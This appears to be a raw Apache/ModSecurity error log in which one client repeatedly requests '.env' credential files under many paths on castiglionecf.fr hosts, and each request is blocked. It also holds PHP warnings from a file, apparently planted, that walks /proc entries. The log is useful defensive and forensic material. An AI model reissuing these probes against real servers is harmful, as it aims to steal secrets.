PHP Warning:  filesize(): stat failed for /proc/552/task/552/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/552/task/552/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Mon May 11 16:25:37.180036 2026] [security2:error] [pid 1411201:tid 1411255] [client 18.180.54.2:58138] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /core/app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/core/app/.env"] [unique_id "agHm4fy_GXSWIKeli0vx_AAAAIk"]
[Mon May 11 16:25:37.180287 2026] [security2:error] [pid 1411201:tid 1411255] [client 18.180.54.2:58138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/core/app/.env"] [unique_id "agHm4fy_GXSWIKeli0vx_AAAAIk"]
[Mon May 11 16:25:37.180798 2026] [core:error] [pid 1411201:tid 1411255] [client 18.180.54.2:58138] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:25:37.180959 2026] [security2:error] [pid 1411201:tid 1411255] [client 18.180.54.2:58138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/core/app/.env"] [unique_id "agHm4fy_GXSWIKeli0vx_AAAAIk"]
[Mon May 11 16:25:37.496051 2026] [security2:error] [pid 1416109:tid 1416152] [client 18.180.54.2:58148] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /private/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/private/.env"] [unique_id "agHm4VV4kyjgo4bQBUhT9gAAANY"]
[Mon May 11 16:25:37.496309 2026] [security2:error] [pid 1416109:tid 1416152] [client 18.180.54.2:58148] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/private/.env"] [unique_id "agHm4VV4kyjgo4bQBUhT9gAAANY"]
[Mon May 11 16:25:37.496795 2026] [core:error] [pid 1416109:tid 1416152] [client 18.180.54.2:58148] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:25:37.496950 2026] [security2:error] [pid 1416109:tid 1416152] [client 18.180.54.2:58148] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/private/.env"] [unique_id "agHm4VV4kyjgo4bQBUhT9gAAANY"]
[Mon May 11 16:25:37.921466 2026] [security2:error] [pid 1412074:tid 1412095] [client 18.180.54.2:58160] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/config/.env"] [unique_id "agHm4TJnyuKVXoStDha0UAAAAFM"]
[Mon May 11 16:25:37.921706 2026] [security2:error] [pid 1412074:tid 1412095] [client 18.180.54.2:58160] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/config/.env"] [unique_id "agHm4TJnyuKVXoStDha0UAAAAFM"]
[Mon May 11 16:25:37.922270 2026] [core:error] [pid 1412074:tid 1412095] [client 18.180.54.2:58160] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:25:37.922440 2026] [security2:error] [pid 1412074:tid 1412095] [client 18.180.54.2:58160] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/config/.env"] [unique_id "agHm4TJnyuKVXoStDha0UAAAAFM"]
[Mon May 11 16:25:38.176821 2026] [security2:error] [pid 1411201:tid 1411248] [client 18.180.54.2:58172] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /application/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/application/.env"] [unique_id "agHm4vy_GXSWIKeli0vx_QAAAII"]
[Mon May 11 16:25:38.177042 2026] [security2:error] [pid 1411201:tid 1411248] [client 18.180.54.2:58172] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/application/.env"] [unique_id "agHm4vy_GXSWIKeli0vx_QAAAII"]
[Mon May 11 16:25:38.177550 2026] [core:error] [pid 1411201:tid 1411248] [client 18.180.54.2:58172] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:25:38.177703 2026] [security2:error] [pid 1411201:tid 1411248] [client 18.180.54.2:58172] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/application/.env"] [unique_id "agHm4vy_GXSWIKeli0vx_QAAAII"]
PHP Warning:  filesize(): stat failed for /proc/853/task/853/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/853/task/853/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/853/task/853/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/853/task/853/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/853/task/853/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/853/task/853/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Mon May 11 16:25:38.621507 2026] [security2:error] [pid 1411055:tid 1411073] [client 18.180.54.2:41434] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /private/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/private/.env"] [unique_id "agHm4kWKUxpmnkK7zHx7ogAAARA"]
[Mon May 11 16:25:38.621743 2026] [security2:error] [pid 1411055:tid 1411073] [client 18.180.54.2:41434] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/private/.env"] [unique_id "agHm4kWKUxpmnkK7zHx7ogAAARA"]
[Mon May 11 16:25:38.622245 2026] [core:error] [pid 1411055:tid 1411073] [client 18.180.54.2:41434] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:25:38.622405 2026] [security2:error] [pid 1411055:tid 1411073] [client 18.180.54.2:41434] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/private/.env"] [unique_id "agHm4kWKUxpmnkK7zHx7ogAAARA"]
[Mon May 11 16:25:38.894758 2026] [security2:error] [pid 1411099:tid 1411117] [client 18.180.54.2:41444] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /bootstrap/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/bootstrap/.env"] [unique_id "agHm4g-Qm4vhlWBPlMi5vgAAABE"]
[Mon May 11 16:25:38.894992 2026] [security2:error] [pid 1411099:tid 1411117] [client 18.180.54.2:41444] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/bootstrap/.env"] [unique_id "agHm4g-Qm4vhlWBPlMi5vgAAABE"]
[Mon May 11 16:25:38.895525 2026] [core:error] [pid 1411099:tid 1411117] [client 18.180.54.2:41444] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:25:38.895903 2026] [security2:error] [pid 1411099:tid 1411117] [client 18.180.54.2:41444] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/bootstrap/.env"] [unique_id "agHm4g-Qm4vhlWBPlMi5vgAAABE"]
[Mon May 11 16:25:39.345502 2026] [security2:error] [pid 1416109:tid 1416129] [client 18.180.54.2:41446] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /application/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/application/.env"] [unique_id "agHm41V4kyjgo4bQBUhT9wAAAMA"]
[Mon May 11 16:25:39.345725 2026] [security2:error] [pid 1416109:tid 1416129] [client 18.180.54.2:41446] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/application/.env"] [unique_id "agHm41V4kyjgo4bQBUhT9wAAAMA"]
[Mon May 11 16:25:39.346214 2026] [core:error] [pid 1416109:tid 1416129] [client 18.180.54.2:41446] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:25:39.346375 2026] [security2:error] [pid 1416109:tid 1416129] [client 18.180.54.2:41446] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/application/.env"] [unique_id "agHm41V4kyjgo4bQBUhT9wAAAMA"]
[Mon May 11 16:25:39.629674 2026] [security2:error] [pid 1411055:tid 1411064] [client 18.180.54.2:41450] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /database/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/database/.env"] [unique_id "agHm40WKUxpmnkK7zHx7owAAAQc"]
[Mon May 11 16:25:39.629909 2026] [security2:error] [pid 1411055:tid 1411064] [client 18.180.54.2:41450] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/database/.env"] [unique_id "agHm40WKUxpmnkK7zHx7owAAAQc"]
[Mon May 11 16:25:39.630398 2026] [core:error] [pid 1411055:tid 1411064] [client 18.180.54.2:41450] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:25:39.630553 2026] [security2:error] [pid 1411055:tid 1411064] [client 18.180.54.2:41450] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/database/.env"] [unique_id "agHm40WKUxpmnkK7zHx7owAAAQc"]
[Mon May 11 16:25:40.092599 2026] [security2:error] [pid 1411099:tid 1411121] [client 18.180.54.2:41466] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /bootstrap/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/bootstrap/.env"] [unique_id "agHm5A-Qm4vhlWBPlMi5vwAAABU"]
[Mon May 11 16:25:40.092803 2026] [security2:error] [pid 1411099:tid 1411121] [client 18.180.54.2:41466] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/bootstrap/.env"] [unique_id "agHm5A-Qm4vhlWBPlMi5vwAAABU"]
[Mon May 11 16:25:40.093297 2026] [core:error] [pid 1411099:tid 1411121] [client 18.180.54.2:41466] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:25:40.093474 2026] [security2:error] [pid 1411099:tid 1411121] [client 18.180.54.2:41466] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/bootstrap/.env"] [unique_id "agHm5A-Qm4vhlWBPlMi5vwAAABU"]
[Mon May 11 16:25:40.330968 2026] [security2:error] [pid 1411201:tid 1411268] [client 18.180.54.2:41482] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /storage/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/storage/.env"] [unique_id "agHm5Py_GXSWIKeli0vyAgAAAJc"]
[Mon May 11 16:25:40.331213 2026] [security2:error] [pid 1411201:tid 1411268] [client 18.180.54.2:41482] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/storage/.env"] [unique_id "agHm5Py_GXSWIKeli0vyAgAAAJc"]
[Mon May 11 16:25:40.331685 2026] [core:error] [pid 1411201:tid 1411268] [client 18.180.54.2:41482] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:25:40.331836 2026] [security2:error] [pid 1411201:tid 1411268] [client 18.180.54.2:41482] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/storage/.env"] [unique_id "agHm5Py_GXSWIKeli0vyAgAAAJc"]
[Mon May 11 16:25:40.833750 2026] [security2:error] [pid 1411099:tid 1411118] [client 18.180.54.2:41484] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /database/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/database/.env"] [unique_id "agHm5A-Qm4vhlWBPlMi5wAAAABI"]
[Mon May 11 16:25:40.833985 2026] [security2:error] [pid 1411099:tid 1411118] [client 18.180.54.2:41484] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/database/.env"] [unique_id "agHm5A-Qm4vhlWBPlMi5wAAAABI"]
[Mon May 11 16:25:40.834480 2026] [core:error] [pid 1411099:tid 1411118] [client 18.180.54.2:41484] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:25:40.835526 2026] [security2:error] [pid 1411099:tid 1411118] [client 18.180.54.2:41484] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/database/.env"] [unique_id "agHm5A-Qm4vhlWBPlMi5wAAAABI"]
[Mon May 11 16:25:41.049420 2026] [security2:error] [pid 1416109:tid 1416132] [client 18.180.54.2:41500] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /var/www/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/var/www/.env"] [unique_id "agHm5VV4kyjgo4bQBUhT-QAAAMI"]
